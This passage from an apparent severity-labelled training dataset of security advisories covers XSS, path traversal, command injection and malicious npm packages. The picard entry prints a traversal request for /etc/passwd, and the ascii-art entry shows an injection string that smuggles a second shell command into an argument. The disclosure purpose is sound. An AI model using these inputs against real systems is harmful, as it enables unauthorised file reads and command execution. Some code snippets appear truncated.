Limdu\n\n[Severity: LOW]\n\n### Impact\nThe `trainBatch` function has a command injection vulnerability. Clients of the Limdu library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.\n\n### Patches\nPatched in version 0.9.5.\n\n### Workarounds\nDo not use trainBatch with classifiers that rely on shell execution, such as SVM Perf, SVM Linear or Adaboost\n\n### References\nNo", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-06-22", "split": "train"} -{"id": "20bca6ae82e2ceca5b1b", "text": "XSS Cross Site Scripting\n\n### Impact\nIt is possible to persistently inject scripts in XWiki.\n\nFor unregistred users:\n- By filling simple text fields\n\nFor registered users:\n- By filling their personal information\n- (if they have edit rights) By filling the values of static lists using App Within Minutes\n\nThat can lead to user's session hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other security vulnerabilities.\nThat can also lead to the attacker taking over an account.\nIf the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account.\n### Patches\nIt has been patched on XWiki 12.8 and 12.6.3.\n\n### Workarounds\nThere is no easy workaround except upgrading XWiki.\n\n### References\nhttps://jira.xwiki.org/browse/XWIKI-17374\n\n### For more information\nIf you have any questions or comments about this advisory:\n * Open an issue in [Jira XWiki](https://jira.xwiki.org)\n * Email us at our [security mailing list](mailto:security@xwiki.org)", "text_raw": "XSS Cross Site Scripting\n\n[Severity: CRITICAL]\n\n### Impact\nIt is possible to persistently inject scripts in XWiki.\n\nFor unregistred users:\n- By filling simple text fields\n\nFor registered users:\n- By filling their personal information\n- (if they have edit rights) By filling the values of static lists using App Within Minutes\n\nThat can lead to user's session hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other security vulnerabilities.\nThat can also lead to the attacker taking over an account.\nIf the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account.\n### Patches\nIt has been patched on XWiki 12.8 and 12.6.3.\n\n### Workarounds\nThere is no easy workaround except upgrading XWiki.\n\n### References\nhttps://jira.xwiki.org/browse/XWIKI-17374\n\n### For more information\nIf you have any questions or comments about this advisory:\n * Open an issue in [Jira XWiki](https://jira.xwiki.org)\n * Email us at our [security mailing list](mailto:security@xwiki.org)", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-04-22", "split": "train"} -{"id": "62b3bd460ed469c1a397", "text": "Prevent user enumeration using Guard or the new Authenticator-based Security\n\nDescription\n-----------\n\nThe ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not. It was also possible to enumerate users by using a timing attack, by comparing time elapsed when authenticating an existing user and authenticating a non-existing user.\n\nResolution\n----------\n\nWe now ensure that 403s are returned whether the user exists or not if the password is invalid or if the user does not exist.\n\nThe patch for this issue is available [here](https://github.com/symfony/symfony/commit/2a581d22cc621b33d5464ed65c4bc2057f72f011) for branch 3.4.\n\nCredits\n-------\n\nI would like to thank James Isaac and Mathias Brodala for reporting the issue and Robin Chalas for fixing the issue.", "text_raw": "Prevent user enumeration using Guard or the new Authenticator-based Security\n\n[Severity: MEDIUM]\n\nDescription\n-----------\n\nThe ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not. It was also possible to enumerate users by using a timing attack, by comparing time elapsed when authenticating an existing user and authenticating a non-existing user.\n\nResolution\n----------\n\nWe now ensure that 403s are returned whether the user exists or not if the password is invalid or if the user does not exist.\n\nThe patch for this issue is available [here](https://github.com/symfony/symfony/commit/2a581d22cc621b33d5464ed65c4bc2057f72f011) for branch 3.4.\n\nCredits\n-------\n\nI would like to thank James Isaac and Mathias Brodala for reporting the issue and Robin Chalas for fixing the issue.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-13", "split": "train"} -{"id": "ebcc11d4dfd8eb79297b", "text": "Null pointer dereference in TFLite MLIR optimizations\n\n### Impact\nAn attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service:\n\nThis is caused by the MLIR optimization of `L2NormalizeReduceAxis` operator. The [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/compiler/mlir/lite/transforms/optimize.cc#L67-L70) unconditionally dereferences a pointer to an iterator to a vector without checking that the vector has elements:\n\n```cc\nbool L2NormalizeReduceAxis(Value sq_op, DenseElementsAttr axis) {\n if (sq_op.getType().cast().getRank() - 1 ==\n *axis.getValues().begin() ||\n *axis.getValues().begin() == -1) {\n // ...\n }\n // ...\n}\n```\n\n### Patches\nWe have patched the issue in GitHub commit [d6b57f461b39fd1aa8c1b870f1b974aac3554955](https://github.com/tensorflow/tensorflow/commit/d6b57f461b39fd1aa8c1b870f1b974aac3554955).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution \nThis vulnerability has been reported by Yakun Zhang of Baidu Security.", "text_raw": "Null pointer dereference in TFLite MLIR optimizations\n\n[Severity: HIGH]\n\n### Impact\nAn attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service:\n\nThis is caused by the MLIR optimization of `L2NormalizeReduceAxis` operator. The [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/compiler/mlir/lite/transforms/optimize.cc#L67-L70) unconditionally dereferences a pointer to an iterator to a vector without checking that the vector has elements:\n\n```cc\nbool L2NormalizeReduceAxis(Value sq_op, DenseElementsAttr axis) {\n if (sq_op.getType().cast().getRank() - 1 ==\n *axis.getValues().begin() ||\n *axis.getValues().begin() == -1) {\n // ...\n }\n // ...\n}\n```\n\n### Patches\nWe have patched the issue in GitHub commit [d6b57f461b39fd1aa8c1b870f1b974aac3554955](https://github.com/tensorflow/tensorflow/commit/d6b57f461b39fd1aa8c1b870f1b974aac3554955).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n \n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n \n### Attribution \nThis vulnerability has been reported by Yakun Zhang of Baidu Security.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "b15d6c6dc7dc45dad092", "text": "appium-chromedriver downloads Resources over HTTP\n\nAffected versions of `appium-chromedriver` insecurely download resources over HTTP.\n\nIn scenarios where an attacker has a privileged network position, they can modify or read items send over HTTP at will. In this case, that includes the chromedriver binary, which may result in remote code execution if overwritten with a malicious binary.\n\n## Recommendation\n\nUpdate to version 2.9.4 or later.", "text_raw": "appium-chromedriver downloads Resources over HTTP\n\n[Severity: HIGH]\n\nAffected versions of `appium-chromedriver` insecurely download resources over HTTP. \n\nIn scenarios where an attacker has a privileged network position, they can modify or read items send over HTTP at will. In this case, that includes the chromedriver binary, which may result in remote code execution if overwritten with a malicious binary.\n\n\n## Recommendation\n\nUpdate to version 2.9.4 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "e3bc7179ff75e67e8adb", "text": "Directory Traversal in picard\n\nAffected versions of `picard` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in picard\n\n[Severity: HIGH]\n\nAffected versions of `picard` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-23", "split": "train"} -{"id": "845c0f6b3c8ea03f3824", "text": "Command Injection in ascii-art\n\nVersions of `ascii-art` before 1.4.4 are vulnerable to command injection. This is exploitable when user input is passed into the argument of the `ascii-art preview` command.\n\nExample Proof of concept:\n`ascii-art preview 'doom\"; touch /tmp/malicious; echo \"'`\n\nGiven that the input is passed on the command line and none of the api methods are vulnerable to this, the likely exploitation vector is when the ascii-art comment is being called programmatically using something like `execFile`.\n\n## Recommendation\n\nUpdate to version 1.4.4 or later.", "text_raw": "Command Injection in ascii-art\n\n[Severity: LOW]\n\nVersions of `ascii-art` before 1.4.4 are vulnerable to command injection. This is exploitable when user input is passed into the argument of the `ascii-art preview` command. \n\n\nExample Proof of concept:\n`ascii-art preview 'doom\"; touch /tmp/malicious; echo \"'`\n\nGiven that the input is passed on the command line and none of the api methods are vulnerable to this, the likely exploitation vector is when the ascii-art comment is being called programmatically using something like `execFile`.\n\n\n## Recommendation\n\nUpdate to version 1.4.4 or later.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "7fb5917991bdc6ba693d", "text": "Double free in linea\n\nAffected versions of this crate did not properly implements the Matrix::zip_elements method, which causes an double free when the given trait implementation might panic. This allows an attacker to corrupt or take control of the memory.", "text_raw": "Double free in linea\n\n[Severity: CRITICAL]\n\nAffected versions of this crate did not properly implements the Matrix::zip_elements method, which causes an double free when the given trait implementation might panic. This allows an attacker to corrupt or take control of the memory.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "1e96350893700732d6f4", "text": "Malicious Package in jajajejejiji\n\nAll versions of `jajajejejiji` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.", "text_raw": "Malicious Package in jajajejejiji\n\n[Severity: CRITICAL]\n\nAll versions of `jajajejejiji` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "53dec020d6a9792e9391", "text": "Disabled Hostname Verification in Opencast\n\nOpencast before version 8.9 and 7.9 disables HTTPS hostname verification of its HTTP client used for a large portion of Opencast's HTTP requests.\n\nHostname verification is an important part when using HTTPS to ensure that the presented certificate is valid for the host. Disabling it can allow for man-in-the-middle attacks.\n\n### Patches\n\nThis problem is fixed in Opencast 7.9 and Opencast 8.9\n\n### Self-Signed Certificates\n\nPlease be aware that fixing the problem means that Opencast will not simply accept any self-signed certificates any longer without properly importing them. If you need those, please make sure to import them into the Java key store. Better yet, get a valid certificate e.g. from [Let's Encrypt](https://letsencrypt.org).", "text_raw": "Disabled Hostname Verification in Opencast\n\n[Severity: HIGH]\n\nOpencast before version 8.9 and 7.9 disables HTTPS hostname verification of its HTTP client used for a large portion of Opencast's HTTP requests.\n\nHostname verification is an important part when using HTTPS to ensure that the presented certificate is valid for the host. Disabling it can allow for man-in-the-middle attacks.\n\n### Patches\n\nThis problem is fixed in Opencast 7.9 and Opencast 8.9\n\n### Self-Signed Certificates\n\nPlease be aware that fixing the problem means that Opencast will not simply accept any self-signed certificates any longer without properly importing them. If you need those, please make sure to import them into the Java key store. Better yet, get a valid certificate e.g. from [Let's Encrypt](https://letsencrypt.org).", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-12-08", "split": "train"} -{"id": "b27b9ea8ea55d0571d17", "text": "NLTK Vulnerable to REDoS\n\nThe nltk package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide as an input to the [`_read_comparison_block()`(https://github.com/nltk/nltk/blob/23f4b1c4b4006b0cb3ec278e801029557cec4e82/nltk/corpus/reader/comparative_sents.py#L259) function in the file `nltk/corpus/reader/comparative_sents.py` may cause an application to consume an excessive amount of CPU.", "text_raw": "NLTK Vulnerable to REDoS\n\n[Severity: HIGH]\n\nThe nltk package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide as an input to the [`_read_comparison_block()`(https://github.com/nltk/nltk/blob/23f4b1c4b4006b0cb3ec278e801029557cec4e82/nltk/corpus/reader/comparative_sents.py#L259) function in the file `nltk/corpus/reader/comparative_sents.py` may cause an application to consume an excessive amount of CPU.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-29", "split": "train"} -{"id": "0353aff60bc7ecf7daf9", "text": "Allocation of Resources Without Limits or Throttling in Hashicorp Consul\n\nHashiCorp Consul and Consul Enterprise include an HTTP API (introduced in 1.2.0) and DNS (introduced in 1.4.3) caching feature that was vulnerable to denial of service.\n\n### Specific Go Packages Affected\ngithub.com/hashicorp/consul/agent/config\n\n### Fix\nThe vulnerability is fixed in versions 1.6.6 and 1.7.4.", "text_raw": "Allocation of Resources Without Limits or Throttling in Hashicorp Consul\n\n[Severity: HIGH]\n\nHashiCorp Consul and Consul Enterprise include an HTTP API (introduced in 1.2.0) and DNS (introduced in 1.4.3) caching feature that was vulnerable to denial of service.\n\n### Specific Go Packages Affected\ngithub.com/hashicorp/consul/agent/config\n\n### Fix\nThe vulnerability is fixed in versions 1.6.6 and 1.7.4.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "084e9863d397c579cd08", "text": "Malicious Package in donotinstallthis\n\nThe package `donotinstallthis` contained malicious code. The package contained a script that was run as part of the install script. The script contacted a remote service tracking how many installations were done. There is no further compromise.\n\n## Recommendation\n\nRemove the package from your environment.", "text_raw": "Malicious Package in donotinstallthis\n\n[Severity: CRITICAL]\n\nThe package `donotinstallthis` contained malicious code. The package contained a script that was run as part of the install script. The script contacted a remote service tracking how many installations were done. There is no further compromise.\n\n\n## Recommendation\n\nRemove the package from your environment.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "b1864679889147c07f9d", "text": "Arbitrary Code Execution in feehi/cms\n\nAn arbitrary file upload vulnerability in Feehi CMS v2.0.8 and below allows attackers to execute arbitrary code via a crafted PHP file.", "text_raw": "Arbitrary Code Execution in feehi/cms\n\n[Severity: HIGH]\n\nAn arbitrary file upload vulnerability in Feehi CMS v2.0.8 and below allows attackers to execute arbitrary code via a crafted PHP file.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-20", "split": "train"} -{"id": "041eef72d03dd2791797", "text": "keycloak-core discloses system properties\n\nIt was found that while parsing the SAML messages the StaxParserUtil class of keycloak before 2.5.1 replaces special strings for obtaining attribute values with system property. This could allow an attacker to determine values of system properties at the attacked system by formatting the SAML request ID field to be the chosen system property which could be obtained in the \"InResponseTo\" field in the response.", "text_raw": "keycloak-core discloses system properties\n\n[Severity: MEDIUM]\n\nIt was found that while parsing the SAML messages the StaxParserUtil class of keycloak before 2.5.1 replaces special strings for obtaining attribute values with system property. This could allow an attacker to determine values of system properties at the attacked system by formatting the SAML request ID field to be the chosen system property which could be obtained in the \"InResponseTo\" field in the response.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-18", "split": "train"} -{"id": "a1e6080b2dd1d5274132", "text": "Cross-site Scripting in SilverStripe Framework\n\nSilverStripe Framework through 4.8.1 allows XSS.", "text_raw": "Cross-site Scripting in SilverStripe Framework\n\n[Severity: MEDIUM]\n\nSilverStripe Framework through 4.8.1 allows XSS.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "f4b7c547d213edbc05cd", "text": "Script Injection in Show In Browser gem\n\nThe Show In Browser (show_in_browser) gem 0.0.3 for Ruby allows local users to inject arbitrary web script or HTML via a symlink attack on `/tmp/browser.html`.", "text_raw": "Script Injection in Show In Browser gem\n\n[Severity: MEDIUM]\n\nThe Show In Browser (show_in_browser) gem 0.0.3 for Ruby allows local users to inject arbitrary web script or HTML via a symlink attack on `/tmp/browser.html`.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "f86a843d4f16c549df09", "text": "Prototype Pollution in lodash.merge\n\nVersions of `lodash.merge` before 4.6.1 are vulnerable to Prototype Pollution. The function 'merge' may allow a malicious user to modify the prototype of `Object` via `__proto__` causing the addition or modification of an existing property that will exist on all objects.\n\n## Recommendation\n\nUpdate to version 4.6.1 or later.", "text_raw": "Prototype Pollution in lodash.merge\n\n[Severity: HIGH]\n\nVersions of `lodash.merge` before 4.6.1 are vulnerable to Prototype Pollution. The function 'merge' may allow a malicious user to modify the prototype of `Object` via `__proto__` causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nUpdate to version 4.6.1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "2a5bf8d60270f320b214", "text": "ViArt Shop Enterprise 4.1 Arbitrary Command Execution Vulnerability", "text_raw": "ViArt Shop Enterprise 4.1 Arbitrary Command Execution Vulnerability\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2012-09-25", "split": "train"} -{"id": "e3db7a76c14faf43ecc8", "text": "ATutor 2.0.2 (lang) HTTP Response Splitting Vulnerability", "text_raw": "ATutor 2.0.2 (lang) HTTP Response Splitting Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-08-06", "split": "train"} -{"id": "b4092345d97c21f523f8", "text": "Heap buffer overflow in Tensorflow\n\n### Impact\nThe implementation of `SparseFillEmptyRowsGrad` uses a double indexing pattern:\nhttps://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L263-L269\n\nIt is possible for `reverse_index_map(i)` to be an index outside of bounds of `grad_values`, thus resulting in a heap buffer overflow.\n\n### Patches\nWe have patched the issue in 390611e0d45c5793c7066110af37c8514e6a6c54 and will release a patch release for all affected versions.\n\nWe recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Heap buffer overflow in Tensorflow\n\n[Severity: MEDIUM]\n\n### Impact\nThe implementation of `SparseFillEmptyRowsGrad` uses a double indexing pattern:\nhttps://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L263-L269\n\nIt is possible for `reverse_index_map(i)` to be an index outside of bounds of `grad_values`, thus resulting in a heap buffer overflow.\n\n### Patches\nWe have patched the issue in 390611e0d45c5793c7066110af37c8514e6a6c54 and will release a patch release for all affected versions.\n\nWe recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-09-25", "split": "train"} -{"id": "e8cdbb3e10c3ebc6a4a7", "text": "VLC media player 1.0.5 Goldeneye (bookmarks) Remote Buffer Overflow PoC", "text_raw": "VLC media player 1.0.5 Goldeneye (bookmarks) Remote Buffer Overflow PoC\n\nSeverity: critical", "severity": "critical", "severity_label": 3, "source": "zeroscience", "timestamp": "2010-03-05", "split": "train"} -{"id": "9518b938198cc0aa0c29", "text": "Malicious Package in secure_identity_login_module\n\nAll versions of `secure_identity_login_module` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in secure_identity_login_module\n\n[Severity: CRITICAL]\n\nAll versions of `secure_identity_login_module` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "dbc7fd166e7fa31d6d4c", "text": "Android WebView Universal Cross-site Scripting\n\nA universal cross-site scripting (UXSS) vulnerability, CVE-2020-6506 (https://crbug.com/1083819), has been identified in the Android WebView system component, which allows cross-origin iframes to execute arbitrary JavaScript in the top-level document. This vulnerability affects React Native apps which use a `react-native-webview` that allows navigation to arbitrary URLs, and when that app runs on systems with an Android WebView version prior to 83.0.4103.106.\n\n## Pending mitigation\n\nEnsure users update their Android WebView system component via the Google Play Store to 83.0.4103.106 or higher to avoid this UXSS. 'react-native-webview' is working on a mitigation but it could take some time.\n\n### References\n\nhttps://alesandroortiz.com/articles/uxss-android-webview-cve-2020-6506/", "text_raw": "Android WebView Universal Cross-site Scripting\n\n[Severity: MEDIUM]\n\nA universal cross-site scripting (UXSS) vulnerability, CVE-2020-6506 (https://crbug.com/1083819), has been identified in the Android WebView system component, which allows cross-origin iframes to execute arbitrary JavaScript in the top-level document. This vulnerability affects React Native apps which use a `react-native-webview` that allows navigation to arbitrary URLs, and when that app runs on systems with an Android WebView version prior to 83.0.4103.106.\n\n## Pending mitigation\n\nEnsure users update their Android WebView system component via the Google Play Store to 83.0.4103.106 or higher to avoid this UXSS. 'react-native-webview' is working on a mitigation but it could take some time.\n\n### References\n\nhttps://alesandroortiz.com/articles/uxss-android-webview-cve-2020-6506/\n\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-10-02", "split": "train"} -{"id": "1de29419cbb47a7b04fe", "text": "In environments that use external location for hive tables, Hive Authorizer in Apache Ranger before 0.7.1 should be checking RWX permission for create table.", "text_raw": "Moderate severity vulnerability that affects org.apache.ranger:ranger\n\n[Severity: MEDIUM]\n\nIn environments that use external location for hive tables, Hive Authorizer in Apache Ranger before 0.7.1 should be checking RWX permission for create table.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "6a7b549a63604d04123f", "text": "XSS in Django\n\nAn issue was discovered in Django version 2.2 before 2.2.13 and 3.0 before 3.0.7. Query parameters generated by the Django admin ForeignKeyRawIdWidget were not properly URL encoded, leading to a possibility of an XSS attack.", "text_raw": "XSS in Django\n\n[Severity: MEDIUM]\n\nAn issue was discovered in Django version 2.2 before 2.2.13 and 3.0 before 3.0.7. Query parameters generated by the Django admin ForeignKeyRawIdWidget were not properly URL encoded, leading to a possibility of an XSS attack.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-06-05", "split": "train"} -{"id": "9c52f6be05db044ed7c4", "text": "Cross-site scripting vulnerability in TinyMCE\n\n### Impact\nA cross-site scripting (XSS) vulnerability was discovered in the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor via the clipboard or APIs. This impacts all users who are using TinyMCE 4.9.10 or lower and TinyMCE 5.4.0 or lower.\n\n### Patches\nThis vulnerability has been patched in TinyMCE 4.9.11 and 5.4.1 by improved HTML parsing and sanitization logic.\n\n### Workarounds\nThe workarounds available are:\n- upgrade to either TinyMCE 4.9.11 or TinyMCE 5.4.1\nor\n- enable the media plugin, which overrides the default parsing behaviour for iframes\nor\n- add the following workaround to update the parsing schema rules for iframes:\n\n#### Example: Change the default schema for iframes\n```js\nsetup: function(editor) {\n editor.on('PreInit', function() {\n editor.schema.getSpecialElements()['iframe'] = /]*>/gi;\n });\n}\n```\n\n### Acknowledgements\nTiny Technologies would like to thank George Steketee and Chris Davis at [Bishop Fox](https://www.bishopfox.com/) for discovering this vulnerability.\n\n### References\nhttps://www.tiny.cloud/docs/release-notes/release-notes54/#securityfixes\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)\n* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)", "text_raw": "Cross-site scripting vulnerability in TinyMCE\n\n[Severity: MEDIUM]\n\n### Impact\nA cross-site scripting (XSS) vulnerability was discovered in the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor via the clipboard or APIs. This impacts all users who are using TinyMCE 4.9.10 or lower and TinyMCE 5.4.0 or lower.\n\n### Patches\nThis vulnerability has been patched in TinyMCE 4.9.11 and 5.4.1 by improved HTML parsing and sanitization logic.\n\n### Workarounds\nThe workarounds available are:\n- upgrade to either TinyMCE 4.9.11 or TinyMCE 5.4.1\nor\n- enable the media plugin, which overrides the default parsing behaviour for iframes\nor\n- add the following workaround to update the parsing schema rules for iframes:\n\n#### Example: Change the default schema for iframes\n```js\nsetup: function(editor) {\n editor.on('PreInit', function() {\n editor.schema.getSpecialElements()['iframe'] = /]*>/gi;\n });\n}\n```\n\n### Acknowledgements\nTiny Technologies would like to thank George Steketee and Chris Davis at [Bishop Fox](https://www.bishopfox.com/) for discovering this vulnerability.\n\n### References\nhttps://www.tiny.cloud/docs/release-notes/release-notes54/#securityfixes\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)\n* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-08-11", "split": "train"} -{"id": "5c3f758b2b4dbe1b550d", "text": "Malicious Package in buffer-xop\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in buffer-xop\n\n[Severity: CRITICAL]\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "7ee4605cf8c7050f0bfa", "text": "Improper Certificate Validation in Apache Airflow\n\nThe LDAP auth backend (airflow.contrib.auth.backends.ldap_auth) prior to Apache Airflow 1.10.1 was misconfigured and contained improper checking of exceptions which disabled server certificate checking.", "text_raw": "Improper Certificate Validation in Apache Airflow\n\n[Severity: HIGH]\n\nThe LDAP auth backend (airflow.contrib.auth.backends.ldap_auth) prior to Apache Airflow 1.10.1 was misconfigured and contained improper checking of exceptions which disabled server certificate checking.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-01-25", "split": "train"} -{"id": "74b70445a1d0f2c098c8", "text": "Path traversal in librenms/librenms\n\nLibrenms 21.11.0 is affected by a path manipulation vulnerability in includes/html/pages/device/showconfig.inc.php.", "text_raw": "Path traversal in librenms/librenms\n\n[Severity: CRITICAL]\n\nLibrenms 21.11.0 is affected by a path manipulation vulnerability in includes/html/pages/device/showconfig.inc.php.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-12-10", "split": "train"} -{"id": "acf41c067e72c352b581", "text": "Regular Expression Denial of Service in slug\n\nAffected versions of `slug` are vulnerable to a regular expression denial of service when parsing untrusted user input.\n\nAbout 50k characters can block the event loop for 2 seconds.\n\n## Recommendation\n\nUpdate to version 0.9.2 or later.", "text_raw": "Regular Expression Denial of Service in slug\n\n[Severity: MEDIUM]\n\nAffected versions of `slug` are vulnerable to a regular expression denial of service when parsing untrusted user input.\n\nThe issue is low severity, as it takes 50,000 characters to cause the event loop to block for 2 seconds,\n\nAbout 50k characters can block the event loop for 2 seconds.\n\n\n## Recommendation\n\nUpdate to version 0.9.2 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-07-24", "split": "train"} -{"id": "dd9330c09757068501de", "text": "rails-html-sanitizer Cross-site Scripting vulnerability\n\nCross-site scripting (XSS) vulnerability in the rails-html-sanitizer gem 1.0.2 for Ruby on Rails 4.2.x and 5.x allows remote attackers to inject arbitrary web script or HTML via an HTML entity that is mishandled by the `Rails::Html::FullSanitizer` class.", "text_raw": "rails-html-sanitizer Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in the rails-html-sanitizer gem 1.0.2 for Ruby on Rails 4.2.x and 5.x allows remote attackers to inject arbitrary web script or HTML via an HTML entity that is mishandled by the `Rails::Html::FullSanitizer` class.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "27cb02c9c408dc0dd92d", "text": "Command Injection in kill-port\n\nVersions of `kill-port` prior to 1.3.2 are 